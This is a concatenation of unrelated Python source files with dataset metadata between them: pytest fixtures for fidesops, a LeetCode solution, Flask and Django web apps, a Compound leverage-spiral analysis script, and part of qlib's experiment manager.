Session,
)
from sqlalchemy.sql import text
from sqlalchemy_utils.functions import (
create_database,
database_exists,
drop_database,
)
from fidesops.db.session import get_db_session, get_db_engine
from fidesops.models.connectionconfig import (
ConnectionConfig,
AccessLevel,
ConnectionType,
)
from fidesops.models.datasetconfig import DatasetConfig
from fidesops.models.policy import ActionType
from fidesops.models.privacy_request import (
ExecutionLog,
ExecutionLogStatus,
PrivacyRequest,
)
from fidesops.service.connectors import PostgreSQLConnector
from .application_fixtures import integration_secrets
logger = logging.getLogger(__name__)
@pytest.fixture
def postgres_example_test_dataset_config(
    connection_config: ConnectionConfig,
    db: Session,
    example_datasets: List[Dict],
) -> Generator:
    """Yield a DatasetConfig for the first example dataset, bound to the
    write-access connection config; the record is deleted on teardown."""
    postgres_dataset = example_datasets[0]
    fides_key = postgres_dataset["fides_key"]
    # Rename the shared connection config so its key matches this dataset.
    connection_config.name = fides_key
    connection_config.key = fides_key
    connection_config.save(db=db)
    dataset = DatasetConfig.create(
        db=db,
        data={
            "connection_config_id": connection_config.id,
            "fides_key": fides_key,
            "dataset": postgres_dataset,
        },
    )
    yield dataset
    dataset.delete(db=db)
@pytest.fixture
def postgres_example_test_dataset_config_read_access(
    read_connection_config: ConnectionConfig,
    db: Session,
    example_datasets: List[Dict],
) -> Generator:
    """Same as postgres_example_test_dataset_config but bound to the
    read-only connection config; deleted on teardown."""
    postgres_dataset = example_datasets[0]
    fides_key = postgres_dataset["fides_key"]
    dataset = DatasetConfig.create(
        db=db,
        data={
            "connection_config_id": read_connection_config.id,
            "fides_key": fides_key,
            "dataset": postgres_dataset,
        },
    )
    yield dataset
    dataset.delete(db=db)
@pytest.fixture(scope="function")
def postgres_execution_log(
    db: Session,
    privacy_request: PrivacyRequest,
) -> ExecutionLog:
    """Yield a pending access-type ExecutionLog touching one field of the
    `user` collection; deleted on teardown."""
    el = ExecutionLog.create(
        db=db,
        data={
            "dataset_name": "my-postgres-db",
            "collection_name": "user",
            "fields_affected": [
                {
                    "path": "my-postgres-db:user:email",
                    "field_name": "email",
                    "data_categories": ["user.provided.identifiable.contact.email"],
                }
            ],
            "action_type": ActionType.access,
            "status": ExecutionLogStatus.pending,
            "privacy_request_id": privacy_request.id,
        },
    )
    yield el
    el.delete(db)
# TODO: Consolidate these
@pytest.fixture(scope="function")
def second_postgres_execution_log(
    db: Session, privacy_request: PrivacyRequest
) -> ExecutionLog:
    """Yield an errored access-type ExecutionLog touching two fields of the
    `address` collection; deleted on teardown."""
    el = ExecutionLog.create(
        db=db,
        data={
            "dataset_name": "my-postgres-db",
            "collection_name": "address",
            "fields_affected": [
                {
                    "path": "my-postgres-db:address:street",
                    "field_name": "street",
                    "data_categories": ["user.provided.identifiable.contact.street"],
                },
                {
                    "path": "my-postgres-db:address:city",
                    "field_name": "city",
                    "data_categories": ["user.provided.identifiable.contact.city"],
                },
            ],
            "action_type": ActionType.access,
            "status": ExecutionLogStatus.error,
            "privacy_request_id": privacy_request.id,
            "message": "Database timed out.",
        },
    )
    yield el
    el.delete(db)
@pytest.fixture(scope="function")
def connection_config(
    db: Session,
) -> Generator:
    """Yield a write-access Postgres ConnectionConfig using the shared
    integration secrets; deleted on teardown."""
    connection_config = ConnectionConfig.create(
        db=db,
        data={
            "name": str(uuid4()),
            "key": "my_postgres_db_1",
            "connection_type": ConnectionType.postgres,
            "access": AccessLevel.write,
            "secrets": integration_secrets["postgres_example"],
        },
    )
    yield connection_config
    connection_config.delete(db)
@pytest.fixture(scope="function")
def read_connection_config(
    db: Session,
) -> Generator:
    """Yield a read-only Postgres ConnectionConfig using the shared
    integration secrets; deleted on teardown."""
    connection_config = ConnectionConfig.create(
        db=db,
        data={
            "name": str(uuid4()),
            "key": "my_postgres_db_1_read_config",
            "connection_type": ConnectionType.postgres,
            "access": AccessLevel.read,
            "secrets": integration_secrets["postgres_example"],
        },
    )
    yield connection_config
    connection_config.delete(db)
@pytest.fixture(scope="function")
def postgres_integration_session_cls(connection_config):
    """Yield a sessionmaker bound to the example Postgres database derived
    from `connection_config`."""
    example_postgres_uri = PostgreSQLConnector(connection_config).build_uri()
    engine = get_db_engine(database_uri=example_postgres_uri)
    # autocommit/autoflush so test statements take effect immediately.
    SessionLocal = get_db_session(
        engine=engine,
        autocommit=True,
        autoflush=True,
    )
    yield SessionLocal
@pytest.fixture(scope="function")
def postgres_integration_session(postgres_integration_session_cls):
    """Yield a fresh session from the integration sessionmaker."""
    yield postgres_integration_session_cls()
@pytest.fixture(scope="function")
def postgres_integration_db(postgres_integration_session):
    """(Re)create the example Postgres database, seed it from
    data/sql/postgres_example.sql, yield the session, then drop the DB."""
    if database_exists(postgres_integration_session.bind.url):
        # Postgres cannot drop databases from within a transaction block, so
        # we should drop the DB this way instead
        drop_database(postgres_integration_session.bind.url)
    create_database(postgres_integration_session.bind.url)
    with open("./data/sql/postgres_example.sql", "r") as query_file:
        lines = query_file.read().splitlines()
    # Strip full-line SQL comments, then run each ';'-separated statement.
    filtered = [line for line in lines if not line.startswith("--")]
    queries = " ".join(filtered).split(";")
    # Plain loop instead of the original side-effect-only list comprehension.
    for query in queries:
        if query:
            postgres_integration_session.execute(f"{text(query.strip())};")
    yield postgres_integration_session
    drop_database(postgres_integration_session.bind.url)
| 29.663462
| 85
| 0.64376
|
0d173ca56c3efb0f15e676be4b598d2e6aec7b16
| 1,075
|
py
|
Python
|
amazon-practice/python/arrays-and-strings/2-longest-substring-without-repeating-characters.py
|
souradeepta/leetcode-practice
|
f20235c0e3846362a86443bc24339b337f43af04
|
[
"MIT"
] | null | null | null |
amazon-practice/python/arrays-and-strings/2-longest-substring-without-repeating-characters.py
|
souradeepta/leetcode-practice
|
f20235c0e3846362a86443bc24339b337f43af04
|
[
"MIT"
] | null | null | null |
amazon-practice/python/arrays-and-strings/2-longest-substring-without-repeating-characters.py
|
souradeepta/leetcode-practice
|
f20235c0e3846362a86443bc24339b337f43af04
|
[
"MIT"
] | null | null | null |
# Longest Substring Without Repeating Characters
# Brute force:: Time: O(n^3), Space: O(min(n,n)) We need O(k) space for checking a substring
# has no duplicate characters, where k is the size of the Set. The size of the Set is upper bounded
# by the size of the string n and the size of the charset/alphabet m
#
# Sliding Window Optimzied:: Time:O(n), Space: O(min(n,m))
class Solution:
    def lengthOfLongestSubstring(self, s: str) -> int:
        """Length of the longest substring of `s` with no repeated characters.

        Single sliding-window pass: `start` is the index just before the
        current window; `last_seen` maps each character to its latest index.
        O(n) time, O(min(n, alphabet)) space.
        """
        # Guard for empty input.
        if not s:
            return 0
        start = -1      # index just before the current window
        longest = 0
        last_seen = {}  # char -> most recent index seen
        for idx, ch in enumerate(s):
            prev = last_seen.get(ch)
            if prev is not None and start <= prev:
                # Repeat inside the window: move start past the previous copy.
                start = prev
            else:
                # Window grew by one character; record the new best length.
                longest = max(longest, idx - start)
            last_seen[ch] = idx
        return longest
| 41.346154
| 100
| 0.581395
|
cc8fbcf68fb9959441ac06742cf94d811cf0be4d
| 1,422
|
py
|
Python
|
app.py
|
Shrawant13/myblog
|
8fc2536aab4c836d5a2ff6bb32e59cb2ac9a3b2a
|
[
"MIT"
] | null | null | null |
app.py
|
Shrawant13/myblog
|
8fc2536aab4c836d5a2ff6bb32e59cb2ac9a3b2a
|
[
"MIT"
] | null | null | null |
app.py
|
Shrawant13/myblog
|
8fc2536aab4c836d5a2ff6bb32e59cb2ac9a3b2a
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
# Application and ORM setup: a single SQLite file next to the app.
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI']='sqlite:///blog.db'
db =SQLAlchemy(app)
class Blogpost(db.Model):
    """A single blog entry; one row per post."""
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(50))
    subtitle = db.Column(db.String(50))
    author = db.Column(db.String(50))
    date_posted = db.Column(db.DateTime)  # when the post was submitted
    content = db.Column(db.Text)          # full post body (unbounded text)
@app.route('/')
def index():
    """Home page: list every blog post, newest first."""
    all_posts = Blogpost.query.order_by(Blogpost.date_posted.desc()).all()
    return render_template('index.html', posts=all_posts)
@app.route('/about')
def about():
    """Render the static about page."""
    template_name = 'about.html'
    return render_template(template_name)
@app.route('/post/<int:post_id>')
def post(post_id):
    """Show one post looked up by primary key (raises if absent)."""
    selected = Blogpost.query.filter_by(id=post_id).one()
    return render_template('post.html', post=selected)
@app.route('/add')
def add():
    """Display the form for composing a new post."""
    form_template = 'add.html'
    return render_template(form_template)
@app.route('/addpost', methods=['POST'])
def addpost():
    """Persist a new blog post from the submitted form, then go home.

    Bug fix: the model's timestamp column is ``date_posted`` — the old code
    passed ``datetime=datetime.now()``, an invalid keyword for ``Blogpost``
    that raised a TypeError on every submission.
    """
    title = request.form['title']
    subtitle = request.form['subtitle']
    author = request.form['author']
    content = request.form['content']
    post = Blogpost(
        title=title,
        subtitle=subtitle,
        author=author,
        content=content,
        date_posted=datetime.now(),
    )
    db.session.add(post)
    db.session.commit()
    return redirect(url_for('index'))
if __name__ == '__main__':
    # Development server only — debug=True must not be enabled in production.
    app.run(debug=True)
| 25.392857
| 106
| 0.696906
|
7f50439a3d99c21171c97a01553f0577ec8136f2
| 449
|
py
|
Python
|
tests/test_multiple_docs.py
|
miselin/templatizer
|
e838b6246c4bbf22b39cbf6f635b1c92cc9da113
|
[
"MIT"
] | null | null | null |
tests/test_multiple_docs.py
|
miselin/templatizer
|
e838b6246c4bbf22b39cbf6f635b1c92cc9da113
|
[
"MIT"
] | 2
|
2022-03-30T04:00:10.000Z
|
2022-03-30T04:30:08.000Z
|
tests/test_multiple_docs.py
|
miselin/templatizer
|
e838b6246c4bbf22b39cbf6f635b1c92cc9da113
|
[
"MIT"
] | null | null | null |
"""Tests for combining multiple documents."""
import unittest
from utils import Simple
import templatizer
# pylint: disable=C0116,R0201
class TestMultipleDocumentGeneration(unittest.TestCase):
    """Unit tests for non-imperative templating."""

    def test_simple_property(self):
        # Two identical documents should render joined by a '---' separator.
        expected = "12345\n---\n12345"
        rendered = templatizer.run([Simple(), Simple()])
        self.assertEqual(rendered, expected)
if __name__ == "__main__":
unittest.main()
| 21.380952
| 56
| 0.714922
|
c3d5c7cc3170ba5d156f5550f32565c5e694f5b1
| 4,320
|
py
|
Python
|
rateapp/views.py
|
Angelamutyota/ratemysite
|
7ed3b95ec820f0b05a816a5822974278ceba2b20
|
[
"Unlicense",
"MIT"
] | null | null | null |
rateapp/views.py
|
Angelamutyota/ratemysite
|
7ed3b95ec820f0b05a816a5822974278ceba2b20
|
[
"Unlicense",
"MIT"
] | null | null | null |
rateapp/views.py
|
Angelamutyota/ratemysite
|
7ed3b95ec820f0b05a816a5822974278ceba2b20
|
[
"Unlicense",
"MIT"
] | null | null | null |
from django.http.response import Http404
from rest_framework import serializers
from rateapp.forms import ProjectForm, CreateUserForm, ProfileForm
from django.shortcuts import render, redirect
from django.http import HttpResponse
from.models import Profile, Project
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from rest_framework.views import APIView
from rest_framework.response import Response
from .serializer import ProfileSerializer, ProjectSerializer
from rateapp import serializer
# Create your views here.
def registerPage(request):
    """Render the signup form and create a new user account on POST.

    Bug fixes: the success message was emitted *after* ``return redirect``
    (dead, unreachable code), and it passed the username as the third
    positional argument of ``messages.success`` (which is ``extra_tags``)
    instead of including it in the message text.
    """
    form = CreateUserForm()
    if request.method == 'POST':
        form = CreateUserForm(request.POST)
        if form.is_valid():
            form.save()
            name = form.cleaned_data.get("username")
            messages.success(request, f'Account was created for {name}')
            return redirect('loginpage')
    # NOTE(review): `profile` here refers to the module-level view function,
    # not a Profile instance — this looks unintended; confirm whether the
    # register template actually uses it before removing.
    context = {'form':form, 'profile':profile}
    return render(request, 'accounts/register.html', context)
def loginPage(request):
    """Authenticate a user from submitted credentials; flash a notice on failure."""
    if request.method == 'POST':
        submitted_username = request.POST.get("username")
        submitted_password = request.POST.get("password")
        user = authenticate(request, username=submitted_username, password=submitted_password)
        if user is None:
            messages.info(request, 'Incorrect Username or Password')
        else:
            login(request, user)
            return redirect('index')
    return render(request, 'accounts/login.html', {})
def logoutpage(request):
    """Terminate the current session and send the user back to login."""
    logout(request)
    destination = 'loginpage'
    return redirect(destination)
@login_required(login_url='loginpage')
def index(request):
    """Landing page: show every project."""
    all_projects = Project.objects.all()
    context = {'projects': all_projects}
    return render(request, 'index.html', context)
@login_required(login_url='loginpage')
def profile(request):
    """Show and edit the logged-in user's profile plus their projects."""
    try:
        # Local `profile` is assigned but never used below; the form is bound
        # to `request.user.profile` directly instead.
        profile = request.user.profile
    except Profile.DoesNotExist:
        # NOTE(review): this fallback Profile is never saved, and the POST
        # branch below still dereferences `request.user.profile`, which would
        # re-raise DoesNotExist for such users — confirm intended behaviour.
        profile = Profile(user=request.user)
    user = request.user
    if request.method == 'POST':
        prof_form = ProfileForm(request.POST, request.FILES, instance=request.user.profile)
        if prof_form.is_valid():
            prof_form.save()
            # Redirect back to the same URL so a refresh does not re-POST.
            return redirect(request.path_info)
    else:
        prof_form = ProfileForm(instance=request.user.profile)
    profiles = Profile.objects.filter(user=user)
    projects = Project.objects.filter(user = user)
    context = {
        'projects': projects,
        'profiles': profiles,
        'prof_form': prof_form,
    }
    return render(request, 'profile.html', context)
@login_required(login_url='loginpage')
def search(request):
    """Search projects by title via the `projectname` query parameter."""
    term = request.GET.get('projectname') if 'projectname' in request.GET else None
    if term:
        matches = Project.search_project(term)
        message = f"{term}"
        return render(request, 'search.html', {"message": message, "projects": matches})
    message = "You haven't searched for any term"
    return render(request, 'search.html', {"message": message})
@login_required(login_url='loginpage')
def new_project(request):
    """Create a project owned by the logged-in user."""
    owner = request.user
    if request.method != 'POST':
        form = ProjectForm()
    else:
        form = ProjectForm(request.POST or None, request.FILES)
        if form.is_valid():
            draft = form.save(commit=False)
            draft.user = owner
            draft.save()
            return redirect('index')
    return render(request,'newproject.html',{"form":form})
@login_required(login_url='loginpage')
def project(request, id):
    """Display a single project, returning HTTP 404 for unknown ids."""
    try:
        found = Project.objects.get(id=id)
    except ObjectDoesNotExist:
        raise Http404()
    return render(request, "project.html", {"project": found})
class ProjectList(APIView):
    """Read-only API endpoint returning every project as JSON."""

    def get(self, request, format=None):
        queryset = Project.objects.all()
        payload = ProjectSerializer(queryset, many=True)
        return Response(payload.data)
class ProfileList(APIView):
    """Read-only API endpoint returning every profile as JSON."""

    def get(self, request, format=None):
        queryset = Profile.objects.all()
        payload = ProfileSerializer(queryset, many=True)
        return Response(payload.data)
| 34.83871
| 98
| 0.688194
|
1dcb30e71630b8cb00f79c2140e351cef000b661
| 5,973
|
py
|
Python
|
scripts/store_spirals.py
|
backdfund/analyzer
|
3069008aad80a2131b2c33d6d3dabd4f22e0a946
|
[
"MIT"
] | 18
|
2021-02-17T23:04:03.000Z
|
2022-02-02T23:07:32.000Z
|
scripts/store_spirals.py
|
Guangye-C/analyzer
|
3069008aad80a2131b2c33d6d3dabd4f22e0a946
|
[
"MIT"
] | null | null | null |
scripts/store_spirals.py
|
Guangye-C/analyzer
|
3069008aad80a2131b2c33d6d3dabd4f22e0a946
|
[
"MIT"
] | 2
|
2021-09-12T03:12:44.000Z
|
2022-03-30T09:34:40.000Z
|
import argparse
import dataclasses
import json
import os
from dataclasses import dataclass
from typing import List
import pymongo
import stringcase
from backd.db import db
from backd.logger import logger
# use cETH as the default asset for which to get all spirals
DEFAULT_ASSET = "0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
# NOTE: the two queries below hit MongoDB at import time, so importing this
# module requires a reachable `events` collection. They establish the overall
# block range covered by the stored events.
MIN_BLOCK = int(
    db.events.find_one(sort=[("blockNumber", pymongo.ASCENDING)])["blockNumber"]
)
MAX_BLOCK = int(
    db.events.find_one(sort=[("blockNumber", pymongo.DESCENDING)])["blockNumber"]
)
parser = argparse.ArgumentParser(prog="store-leverage-spirals")
parser.add_argument(
"-m",
"--market",
required=True,
type=str,
help="path to the jsonl file with DSR rates",
)
parser.add_argument(
"-f",
"--file",
required=True,
type=str,
help="output json file to store leverage spiral results",
)
parser.add_argument(
"-min",
"--minimum",
required=False,
default=MIN_BLOCK,
type=int,
help="minimum block from which spirals should be computed",
)
parser.add_argument(
"-max",
"--maximum",
required=False,
default=MAX_BLOCK,
type=int,
help="maximum block from which spirals should be computed",
)
parser.add_argument(
"-a",
"--address",
required=False,
type=str,
help="address for which spirals should be computed",
)
@dataclass
class SpiralEvent:
    """Base record for one on-chain event participating in a leverage spiral."""

    address: str    # account that triggered the event
    event: str      # event name, e.g. "Mint" or "Borrow"
    log_index: int  # position of the event within the transaction's log
@dataclass
class SpiralMintEvent(SpiralEvent):
    """A Mint (collateral deposit) step of a spiral."""

    mint_amount: int  # amount minted; populated as value/1e18 (whole tokens)
@dataclass
class SpiralBorrowEvent(SpiralEvent):
    """A Borrow step of a spiral."""

    borrow_market: str   # lower-cased address of the market borrowed from
    borrow_amount: int   # amount borrowed; populated as value/1e18
    account_borrows: int # account's total borrows after this event, /1e18
@dataclass
class Spiral:
    """All Mint/Borrow events of one transaction that form a leverage spiral."""

    collateral_asset: str    # market address used as collateral
    block_number: int
    transaction_index: int
    transaction_hash: str
    events: List[SpiralEvent]  # ordered by log index
def store_leverage_spirals(
    market: str, file: str, start_block: int = MIN_BLOCK, end_block: int = MAX_BLOCK
):
    """
    Iterates over all events for a given block range and records all leverage
    spirals that occur within a single transaction. The state of a spiral is
    updated to contain all of the spiral events until the Transaction Index or
    the Block Number changes. A spiral has to contain the 'market' asset as
    collateral. Note: no repays of leverage spirals are recorded at the moment.
    """
    # (annotation fixed: `market` is an address string — `.lower()` is called
    # on it below — not an int as previously annotated)
    spiral_events = []
    # Events ordered by (block, tx index, log index) so that all events of one
    # transaction are contiguous in the stream.
    cursor = db.events.find(
        {"blockNumber": {"$gte": start_block, "$lte": end_block}}
    ).sort(
        [
            ("blockNumber", pymongo.ASCENDING),
            ("transactionIndex", pymongo.ASCENDING),
            ("logIndex", pymongo.ASCENDING),
        ]
    )
    # Consume the first event to seed the candidate state.
    # NOTE(review): this first event itself is never inspected for Mint/Borrow
    # below, and cursor.next() raises StopIteration on an empty range — confirm
    # both are acceptable.
    event = cursor.next()
    assert event["blockNumber"] >= start_block
    candidate_spiral = Spiral(
        collateral_asset=market,
        block_number=event["blockNumber"],
        transaction_index=event["transactionIndex"],
        transaction_hash=event["transactionHash"],
        events=[],
    )
    last_block_number = event["blockNumber"]
    last_tx_index = event["transactionIndex"]
    for event in cursor:
        if "event" not in event.keys():
            # Documents without an "event" field reset the candidate state.
            candidate_spiral = Spiral(
                collateral_asset=market,
                block_number=event["blockNumber"],
                transaction_index=event["transactionIndex"],
                transaction_hash=event["transactionHash"],
                events=[],
            )
            continue
        # A new block or a new transaction within the same block closes the
        # previous candidate.
        if (event["blockNumber"] != last_block_number) or (
            (event["transactionIndex"] != last_tx_index)
            and (event["blockNumber"] == last_block_number)
        ):
            # check if it is a spiral
            if is_spiral(candidate_spiral):
                print("Spiral: ", candidate_spiral)
                spiral_events.append(dataclasses.asdict(candidate_spiral))
            last_block_number = event["blockNumber"]
            last_tx_index = event["transactionIndex"]
            candidate_spiral = Spiral(
                collateral_asset=market,
                block_number=event["blockNumber"],
                transaction_index=event["transactionIndex"],
                transaction_hash=event["transactionHash"],
                events=[],
            )
        # Only Mints of the chosen collateral market count; Borrows from any
        # market count.
        if (event["event"] == "Mint") and (event["address"].lower() == market.lower()):
            spiral_event = process_mint_event(event)
            candidate_spiral.events.append(spiral_event)
        elif event["event"] == "Borrow":
            spiral_event = process_borrow_event(event)
            candidate_spiral.events.append(spiral_event)
    # NOTE(review): the final candidate (last transaction in the range) is
    # never flushed into spiral_events — confirm whether that is intended.
    with open(file, "w") as f:
        json.dump(spiral_events, f)
def process_mint_event(event: dict) -> SpiralEvent:
    """Convert a raw Mint event document into a SpiralMintEvent (amount in whole tokens)."""
    values = event["returnValues"]
    return SpiralMintEvent(
        event=event["event"],
        log_index=event["logIndex"],
        address=values["minter"],
        mint_amount=int(values["mintAmount"]) / 1e18,
    )
def process_borrow_event(event: dict) -> SpiralEvent:
    """Convert a raw Borrow event document into a SpiralBorrowEvent (amounts in whole tokens)."""
    values = event["returnValues"]
    return SpiralBorrowEvent(
        event=event["event"],
        log_index=event["logIndex"],
        borrow_market=event["address"].lower(),
        address=values["borrower"],
        borrow_amount=int(values["borrowAmount"]) / 1e18,
        account_borrows=int(values["accountBorrows"]) / 1e18,
    )
def is_spiral(candidate: Spiral) -> bool:
    """
    A candidate qualifies as an actual spiral only when it contains more than
    one "Mint" AND more than one "Borrow" event; returns True in that case,
    False otherwise.
    """
    n_borrows = sum(1 for e in candidate.events if e.event == "Borrow")
    n_mints = sum(1 for e in candidate.events if e.event == "Mint")
    return n_borrows > 1 and n_mints > 1
def main():
    """CLI entry point: parse options and store spirals for the chosen market."""
    options = parser.parse_args()
    store_leverage_spirals(options.market, options.file, options.minimum, options.maximum)
if __name__ == "__main__":
main()
| 29.136585
| 87
| 0.644065
|
1eccfcaeaacb9bad72ee70b4e3ae34fc5d96e5f8
| 1,023
|
py
|
Python
|
Processes/imscommon/imscommon/table_joiner.py
|
rangaswamymr/incubator-bluemarlin
|
6cb60b2a41edc6509377f9eacb7660d199a9485b
|
[
"Apache-2.0"
] | 4
|
2021-04-08T17:17:34.000Z
|
2022-02-25T11:52:21.000Z
|
Processes/imscommon/imscommon/table_joiner.py
|
rangaswamymr/incubator-bluemarlin
|
6cb60b2a41edc6509377f9eacb7660d199a9485b
|
[
"Apache-2.0"
] | 23
|
2021-03-09T20:37:02.000Z
|
2022-03-07T16:16:32.000Z
|
Processes/imscommon/imscommon/table_joiner.py
|
rangaswamymr/incubator-bluemarlin
|
6cb60b2a41edc6509377f9eacb7660d199a9485b
|
[
"Apache-2.0"
] | 6
|
2021-03-08T19:46:09.000Z
|
2022-01-12T17:59:29.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class TableJoiner:
    """Thin wrapper that executes a join query through a Hive context."""

    def __init__(self, hive_context, query):
        # Store the context first, then the SQL to run through it.
        self.hive_context = hive_context
        self.query = query

    def join_tables(self):
        """Run the stored query and return the resulting DataFrame."""
        return self.hive_context.sql(self.query)
| 40.92
| 75
| 0.73998
|
175127b2e9c4788dea80e2cfafed6fee9e523882
| 101
|
py
|
Python
|
lib/python2.7/_weakrefset.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6
|
2017-01-22T03:15:01.000Z
|
2019-12-01T16:19:36.000Z
|
lib/python2.7/_weakrefset.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 4
|
2020-02-11T23:39:49.000Z
|
2022-01-13T00:40:48.000Z
|
lib/python2.7/_weakrefset.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6
|
2017-01-19T21:49:55.000Z
|
2021-04-14T09:57:17.000Z
|
/usr/local/Cellar/python/2.7.13/Frameworks/Python.framework/Versions/2.7/lib/python2.7/_weakrefset.py
| 101
| 101
| 0.821782
|
56fe810c38d04fad8545d45217c679c1ca3dfe4b
| 14,966
|
py
|
Python
|
qlib/workflow/expm.py
|
Rekind1e/qlib
|
373f6e0900df73a6741c73fd89882edadcd9e968
|
[
"MIT"
] | null | null | null |
qlib/workflow/expm.py
|
Rekind1e/qlib
|
373f6e0900df73a6741c73fd89882edadcd9e968
|
[
"MIT"
] | null | null | null |
qlib/workflow/expm.py
|
Rekind1e/qlib
|
373f6e0900df73a6741c73fd89882edadcd9e968
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import mlflow
from mlflow.exceptions import MlflowException
from mlflow.entities import ViewType
import os
from pathlib import Path
from contextlib import contextmanager
from typing import Optional, Text
from .exp import MLflowExperiment, Experiment
from ..config import C
from .recorder import Recorder
from ..log import get_module_logger
logger = get_module_logger("workflow", "INFO")
class ExpManager:
    """
    This is the `ExpManager` class for managing experiments. The API is designed similar to mlflow.
    (The link: https://mlflow.org/docs/latest/python_api/mlflow.html)
    """

    def __init__(self, uri: Text, default_exp_name: Optional[Text]):
        self._current_uri = uri
        self.default_exp_name = default_exp_name
        self.active_experiment = None  # only one experiment can be active at a time

    def __repr__(self):
        return "{name}(current_uri={curi})".format(name=self.__class__.__name__, curi=self._current_uri)

    def start_exp(
        self,
        experiment_name: Optional[Text] = None,
        recorder_name: Optional[Text] = None,
        uri: Optional[Text] = None,
        **kwargs,
    ):
        """
        Start an experiment. This method includes first get_or_create an experiment, and then
        set it to be active.

        Parameters
        ----------
        experiment_name : str
            name of the active experiment.
        recorder_name : str
            name of the recorder to be started.
        uri : str
            the current tracking URI.

        Returns
        -------
        An active experiment.
        """
        # Placeholder-free strings no longer carry a pointless f-prefix.
        raise NotImplementedError("Please implement the `start_exp` method.")

    def end_exp(self, recorder_status: Text = Recorder.STATUS_S, **kwargs):
        """
        End an active experiment.

        Parameters
        ----------
        recorder_status : str
            the status of the active recorder of the experiment.
        """
        raise NotImplementedError("Please implement the `end_exp` method.")

    def create_exp(self, experiment_name: Optional[Text] = None):
        """
        Create an experiment.

        Parameters
        ----------
        experiment_name : str
            the experiment name, which must be unique.

        Returns
        -------
        An experiment object.
        """
        raise NotImplementedError("Please implement the `create_exp` method.")

    def search_records(self, experiment_ids=None, **kwargs):
        """
        Get a pandas DataFrame of records that fit the search criteria of the experiment.
        Inputs are the search criteria user want to apply.

        Returns
        -------
        A pandas.DataFrame of records, where each metric, parameter, and tag
        are expanded into their own columns named metrics.*, params.*, and tags.*
        respectively. For records that don't have a particular metric, parameter, or tag, their
        value will be (NumPy) Nan, None, or None respectively.
        """
        raise NotImplementedError("Please implement the `search_records` method.")

    def get_exp(self, experiment_id=None, experiment_name=None, create: bool = True):
        """
        Retrieve an experiment. This method includes getting an active experiment, and get_or_create a specific experiment.
        The returned experiment will be active.

        When user specify experiment id and name, the method will try to return the specific experiment.
        When user does not provide recorder id or name, the method will try to return the current active experiment.
        The `create` argument determines whether the method will automatically create a new experiment according
        to user's specification if the experiment hasn't been created before.

        * If `create` is True:
            * If `active experiment` exists:
                * no id or name specified, return the active experiment.
                * if id or name is specified, return the specified experiment. If no such exp found, create a new experiment with given id or name, and the experiment is set to be active.
            * If `active experiment` not exists:
                * no id or name specified, create a default experiment.
                * if id or name is specified, return the specified experiment. If no such exp found, create a new experiment with given id or name, and the experiment is set to be active.
        * Else If `create` is False:
            * If `active experiment` exists:
                * no id or name specified, return the active experiment.
                * if id or name is specified, return the specified experiment. If no such exp found, raise Error.
            * If `active experiment` not exists:
                * no id or name specified. If the default experiment exists, return it, otherwise, raise Error.
                * if id or name is specified, return the specified experiment. If no such exp found, raise Error.

        Parameters
        ----------
        experiment_id : str
            id of the experiment to return.
        experiment_name : str
            name of the experiment to return.
        create : boolean
            create the experiment it if hasn't been created before.

        Returns
        -------
        An experiment object.
        """
        # Special case: neither id nor name given. (The original duplicated
        # this condition in two consecutive `if` statements; they are merged
        # here with identical behavior.)
        if experiment_id is None and experiment_name is None:
            if self.active_experiment is not None:
                return self.active_experiment
            # No active experiment to return — fall back to the default name.
            experiment_name = self.default_exp_name
        if create:
            exp, is_new = self._get_or_create_exp(experiment_id=experiment_id, experiment_name=experiment_name)
        else:
            exp, is_new = self._get_exp(experiment_id=experiment_id, experiment_name=experiment_name), False
        if is_new:
            self.active_experiment = exp
            # a freshly created experiment is started immediately
            self.active_experiment.start()
        return exp

    def _get_or_create_exp(self, experiment_id=None, experiment_name=None) -> (object, bool):
        """
        Method for getting or creating an experiment. It will try to first get a valid experiment, if exception occurs, it will
        automatically create a new experiment based on the given id and name.
        Returns a (experiment, is_new) pair.
        """
        try:
            if experiment_id is None and experiment_name is None:
                experiment_name = self.default_exp_name
            return self._get_exp(experiment_id=experiment_id, experiment_name=experiment_name), False
        except ValueError:
            if experiment_name is None:
                experiment_name = self.default_exp_name
            logger.info(f"No valid experiment found. Create a new experiment with name {experiment_name}.")
            return self.create_exp(experiment_name), True

    def _get_exp(self, experiment_id=None, experiment_name=None) -> Experiment:
        """
        get specific experiment by name or id. If it does not exist, raise ValueError

        Parameters
        ----------
        experiment_id :
            The id of experiment
        experiment_name :
            The name of experiment

        Returns
        -------
        Experiment:
            The searched experiment

        Raises
        ------
        ValueError
        """
        raise NotImplementedError("Please implement the `_get_exp` method")

    def delete_exp(self, experiment_id=None, experiment_name=None):
        """
        Delete an experiment.

        Parameters
        ----------
        experiment_id : str
            the experiment id.
        experiment_name : str
            the experiment name.
        """
        raise NotImplementedError("Please implement the `delete_exp` method.")

    @property
    def default_uri(self):
        """
        Get the default tracking URI from qlib.config.C
        """
        if "kwargs" not in C.exp_manager or "uri" not in C.exp_manager["kwargs"]:
            raise ValueError("The default URI is not set in qlib.config.C")
        return C.exp_manager["kwargs"]["uri"]

    @property
    def uri(self):
        """
        Get the default tracking URI or current URI.

        Returns
        -------
        The tracking URI string.
        """
